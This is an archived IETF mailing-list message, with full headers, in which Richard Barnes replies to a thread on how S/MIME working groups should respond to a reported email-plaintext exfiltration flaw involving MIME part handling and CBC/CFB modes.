Re: [lamps] More mail madness?
Richard Barnes <rlb@ipv.sx> Mon, 14 May 2018 16:39 UTC
Return-Path: <rlb@ipv.sx>
X-Original-To: ietf@ietfa.amsl.com
Delivered-To: ietf@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 6B3AE12DA04 for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:39:42 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -1.909
X-Spam-Level:
X-Spam-Status: No, score=-1.909 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, HTML_MESSAGE=0.001, RCVD_IN_DNSWL_NONE=-0.0001, T_DKIMWL_WL_MED=-0.01] autolearn=unavailable autolearn_force=no
Authentication-Results: ietfa.amsl.com (amavisd-new); dkim=pass (2048-bit key) header.d=ipv-sx.20150623.gappssmtp.com
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id pQ2s8XKFaUb2 for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:39:39 -0700 (PDT)
Received: from mail-ot0-x230.google.com (mail-ot0-x230.google.com [IPv6:2607:f8b0:4003:c0f::230]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 18352126C22 for <ietf@ietf.org>; Mon, 14 May 2018 09:39:39 -0700 (PDT)
Received: by mail-ot0-x230.google.com with SMTP id l13-v6so15032406otk.9 for <ietf@ietf.org>; Mon, 14 May 2018 09:39:39 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ipv-sx.20150623.gappssmtp.com; s=20150623; h=mime-version:references:in-reply-to:from:date:message-id:subject:to :cc; bh=wjiXdsMOWPRpKvL1Wj2bBS8TmnxiFBgbGBx4nZiKj0s=; b=XK7B8wYT0Rw4FNBH8YNTqYaZml64NMfMOdEUP2G1osJpg9EYLRAYY8kwWXP5sJj7P0 xXiEYvMHPoBciDIRXGlnBr+K4Pc42oCqGTRWFr/tbRv3dLuvkpZsgibq2xuz4NFZnk+S 0ShWlpo7DzEA9vMpSVu3o5h+nnGz7ybaN0NPHTzycfrQJ7/BzrxAPzgfaD+nyPrePsR5 vPmdfqc/Ae1dw5xdz7IC7yyAL5rvE+tr519S/MPLCi7Utt7/OyFmvs2E75bhU9GRWg50 KEeIqdSmbsYW7+zXbF4x+PmEgfDTsDNhL0eaP18dIjMZq98r9GLD2UjLKhzQyToxWLyk 5hbw==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to:cc; bh=wjiXdsMOWPRpKvL1Wj2bBS8TmnxiFBgbGBx4nZiKj0s=; b=gpe1PuW8ezuyIzaQwxLeZhhUop9XmOOooqTRO4+QrhytKzgr0K9tP8rEK/PAf4wB6q TXUsrv0l0HrE2e9E8gp5i3TXZ+z8HWnVYo/t2jzqio53GJhB6Fc0Bn9KLvLHU4mAJNN0 2bDXJYg1FAzDfsUOkVXQgQqFJfSs5nO3csAISqw5sAnSMg/QhVzrTPcBmA6wTiYMJVjv 0ZssVwe4f6x5KcYExuHwii77qa++m/nFueLq8iWQVsEAxWWdGpqMCMxLKsd5IIanSC/9 z9W9qZ+cE8twCtD/C96XXIT9FhF5NH3DcrTKMVu03yOMeR2XgDuYpS0jYHyOoFg3p28k momg==
X-Gm-Message-State: ALKqPwfikDU7a2bPWrIJSPXOUQaV1ZBdM5gazQhGhBhtSxMhQdQtRr// 66M8Xxa5zIH1zBgpdAImLYWxAhPp6nb2QHD4R5ubDQ==
X-Google-Smtp-Source: AB8JxZoWa+7n6RtJ83wm13gbBTOw+4ue7K9U5snv7vk0gpGi2FDRiw6vSBX//wuQOaSWnu7I0Vst5JQWiEEKxfvn+6Q=
X-Received: by 2002:a9d:4b8f:: with SMTP id k15-v6mr7959366otf.248.1526315978422; Mon, 14 May 2018 09:39:38 -0700 (PDT)
MIME-Version: 1.0
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com> <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca> <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
In-Reply-To: <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
From: Richard Barnes <rlb@ipv.sx>
Date: Mon, 14 May 2018 12:39:27 -0400
Message-ID: <CAL02cgQGew0=5s-ipyJSD=kp8+uK5juYFYUdepWeDFjf6raqsw@mail.gmail.com>
Subject: Re: [lamps] More mail madness?
To: Russ Housley <housley@vigilsec.com>
Cc: Paul Wouters <paul@nohats.ca>, spasm@ietf.org, Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>
Content-Type: multipart/alternative; boundary="000000000000b58b43056c2d2121"
Archived-At: <https://mailarchive.ietf.org/arch/msg/ietf/EpwF6VXh0dl1noElKd9Qoa48V0M>
X-BeenThere: ietf@ietf.org
X-Mailman-Version: 2.1.22
Precedence: list
List-Id: IETF-Discussion <ietf.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/ietf>, <mailto:ietf-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/ietf/>
List-Post: <mailto:ietf@ietf.org>
List-Help: <mailto:ietf-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/ietf>, <mailto:ietf-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 14 May 2018 16:39:42 -0000
Russ: Is there some more work to be done here to address the CBC/CFB issues? Even if the encapsulation has AEAD support, maybe there's some negotiation thingy? On Mon, May 14, 2018, 12:37 Russ Housley <housley@vigilsec.com> wrote: > > On May 14, 2018, at 12:35 PM, Paul Wouters <paul@nohats.ca> wrote: > > On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote: > > We are working on text for S/MIME that says that each portion of a MIME > multi-part needs to be handled in its own sandbox. The direct exfiltration > that is described happens because the mail user agent glues the various > portions together for display to the user, which in the example on the web > page causes an image to be fetched from the attacker's website with the > message plaintext as part of the URL. > > > So that’s the bandaid. What and where will work be done on a solution? > > > LAMPS just sent an update to the S/MIME message document to the IESG. My > guess is that there will be discussion on the spasm@ietf.org mail list. > > Russ > > _______________________________________________ > Spasm mailing list > Spasm@ietf.org > https://www.ietf.org/mailman/listinfo/spasm >
- More mail madness? Phillip Hallam-Baker
- Re: More mail madness? Russ Housley
- Re: More mail madness? Paul Wouters
- Re: More mail madness? Russ Housley
- Re: [lamps] More mail madness? Richard Barnes
- Re: More mail madness? Viktor Dukhovni
- Re: [lamps] More mail madness? Phillip Hallam-Baker
- Re: More mail madness? Sam Hartman
- Re: More mail madness? Russ Housley